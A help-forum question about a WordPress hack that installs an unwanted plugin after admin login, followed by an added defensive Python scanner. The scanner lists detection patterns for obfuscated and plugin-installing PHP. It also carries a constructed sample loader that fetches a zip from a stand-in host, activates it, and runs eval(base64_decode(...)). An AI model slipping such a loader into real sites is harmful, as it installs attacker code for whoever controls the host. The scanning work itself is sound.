WordPress redirect hack – can’t find how they did this [closed]
I have a small WordPress website, and it started to give me some redirects where it is not supposed to. I checked checksums with wp core verify-checksums and the same for plugins. The problem is that external redirect checkers don't find anything, because it redirects only when I log in.
After I log in, a plugin (sabai, sabai-discuss) gets installed from ultra-seo-processor-wp.zip, which I didn't install. I can't understand how this is possible if the checksums verify.
I have a theme (Unicorn 2.1.3) and a paid plugin which is not checked against checksums. The theme is the main suspect because it hasn't been updated in a long time.
Are there any offline scanners which will work without a running webserver?
If I can't find a better solution, I'm thinking of getting rid of the theme, but sabai and sabai-discuss are a crucial part, so I'm looking for a way to clean up what they inserted there, but I don't know how to find it.
I'd like to keep the modified theme too, because it works too well and everyone is used to it.
How should I approach finding what they added there? I suppose there are some calls to the WordPress API in the theme which they call from the admin panel to install the plugin. What should I grep for?
My main hope here is that it's an automated hack that some of you have seen in your projects.
I found some files with names like "hidden.php" which were added by the hacker and I removed them, but the problem remains. So I'm asking for advice on what to look for.
I also checked the timestamp of the freshly downloaded zip file of ultra-seo-processor-wp.zip and examined the nginx logs. There were no requests except from me logging in to the admin panel, so I think there should be some WP API calls added in some theme files.
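The question asks what to grep for in the theme. Below is an added example of an offline indicator scan, not code from the question or from WordPress: it walks an offline copy of wp-content (a backup, or the live tree mounted read-only, so no webserver is needed) and reports PHP files that contain obfuscation primitives (eval, base64_decode, gzinflate, str_rot13, create_function, preg_replace with the /e modifier) or calls into the plugin-install API that a theme has no legitimate reason to make (download_url, unzip_file, Plugin_Upgrader, activate_plugin). Since the question says the redirect only fires after login, a match on is_user_logged_in / current_user_can / is_admin is recorded too, but on its own it is not enough to flag a file, because real themes use those. The function and file names in the constructed sample tree (a "unicorn" theme directory, a placeholder download host) are assumptions for the demo, and the WordPress and PHP function names are real. File modification times are reported as a secondary hint; they can be faked, so treat a recent mtime as a reason to look, not as proof.

```python
"""Offline indicator scan for injected PHP under a WordPress content directory.

Added example, not code from the original question or from WordPress. Assumes an
offline copy of wp-content; the webserver does not need to run. Sample files and
paths in build_sample_tree() are constructed for the demo.
"""
import os
import re
import sys
import tempfile
from datetime import datetime, timezone
from typing import Optional

# Constructs a stock theme rarely needs but injected loaders commonly use.
INDICATORS = {
    # obfuscation and dynamic code execution
    "eval": re.compile(r"\beval\s*\("),
    "base64_decode": re.compile(r"\bbase64_decode\s*\("),
    "gz-decode": re.compile(r"\bgz(inflate|uncompress|decode)\s*\("),
    "str_rot13": re.compile(r"\bstr_rot13\s*\("),
    "create_function": re.compile(r"\bcreate_function\s*\("),
    "preg_replace /e": re.compile(r"preg_replace\s*\(\s*(['\"])/.*?/[a-zA-Z]*e[a-zA-Z]*\1"),
    "variable function call": re.compile(r"\$[A-Za-z_]\w*\s*\(\s*['\"$]"),
    # WordPress plugin install/activate API: theme code has no reason to call these
    "download_url": re.compile(r"\bdownload_url\s*\("),
    "unzip_file": re.compile(r"\bunzip_file\s*\("),
    "Plugin_Upgrader": re.compile(r"\bPlugin_Upgrader\b"),
    "activate_plugin": re.compile(r"\bactivate_plugins?\s*\("),
    # writing files or fetching remote content from theme code
    "file_put_contents": re.compile(r"\bfile_put_contents\s*\("),
    "remote fetch": re.compile(r"\b(wp_remote_get|curl_exec)\s*\(|file_get_contents\s*\(\s*['\"]https?:"),
    # gating on a logged-in user, matching "it only redirects after I log in"
    "login-gated": re.compile(r"\b(is_user_logged_in|current_user_can|is_admin)\s*\("),
}
# Any of these alone justifies a manual look; the login gate only counts alongside others.
STRONG = set(INDICATORS) - {"login-gated"}


def scan_php_source(text: str) -> list:
    """Return the sorted indicator names found in one PHP source text."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))


def scan_tree(root: str, since: Optional[datetime] = None) -> dict:
    """Walk root, scan every .php file, and report files worth a manual review.

    A file is reported if it has a strong indicator, or if its mtime is after
    `since` (e.g. the last known-good deployment). mtimes can be forged, so the
    second condition is a hint only.
    """
    findings = {}
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            if not fn.endswith(".php"):
                continue
            path = os.path.join(dirpath, fn)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = scan_php_source(fh.read())
            mtime = datetime.fromtimestamp(os.path.getmtime(path), tz=timezone.utc)
            recent = since is not None and mtime > since
            if recent or any(h in STRONG for h in hits):
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                findings[rel] = {"hits": hits, "modified_after_since": recent}
    return findings


# Constructed sample files: a harmless template and a loader of the kind described.
BENIGN_TEMPLATE = (
    "<?php\nget_header();\n"
    "if ( is_admin() ) { add_action( 'admin_menu', 'unicorn_menu' ); }\n"
    "get_footer();\n"
)
INJECTED_LOADER = (
    "<?php\n"
    "if ( is_user_logged_in() ) {\n"
    "    $tmp = download_url( 'http://PLACEHOLDER.invalid/ultra-seo-processor-wp.zip' );\n"
    "    unzip_file( $tmp, WP_PLUGIN_DIR );\n"
    "    activate_plugin( 'ultra-seo-processor-wp/ultra-seo-processor-wp.php' );\n"
    "}\n"
    "eval( base64_decode( 'UExBQ0VIT0xERVI=' ) );\n"  # decodes to 'PLACEHOLDER'
)


def build_sample_tree() -> str:
    """Create a throwaway wp-content-like tree with one clean and one injected file."""
    root = tempfile.mkdtemp(prefix="wp-content-")
    theme = os.path.join(root, "themes", "unicorn")  # assumed theme directory name
    os.makedirs(theme)
    with open(os.path.join(theme, "header.php"), "w") as fh:
        fh.write(BENIGN_TEMPLATE)
    with open(os.path.join(theme, "functions.php"), "w") as fh:
        fh.write(INJECTED_LOADER)
    return root


def demo() -> dict:
    """Scan the constructed sample tree; only functions.php should be reported."""
    return scan_tree(build_sample_tree())


if __name__ == "__main__":
    # Usage: python scan.py /path/to/offline/wp-content  (no argument: demo tree)
    target = sys.argv[1] if len(sys.argv) > 1 else build_sample_tree()
    for rel_path, finding in sorted(scan_tree(target).items()):
        print(f"{rel_path}: {', '.join(finding['hits'])}")
```

Run it against the offline copy and review each reported file by hand; a hit is a reason to read the surrounding code, not a verdict. Once the injected file is found, the add_action or add_filter lines around the match usually show which hook fires the redirect or the install, which is the piece to remove before re-running wp core verify-checksums on a clean theme copy.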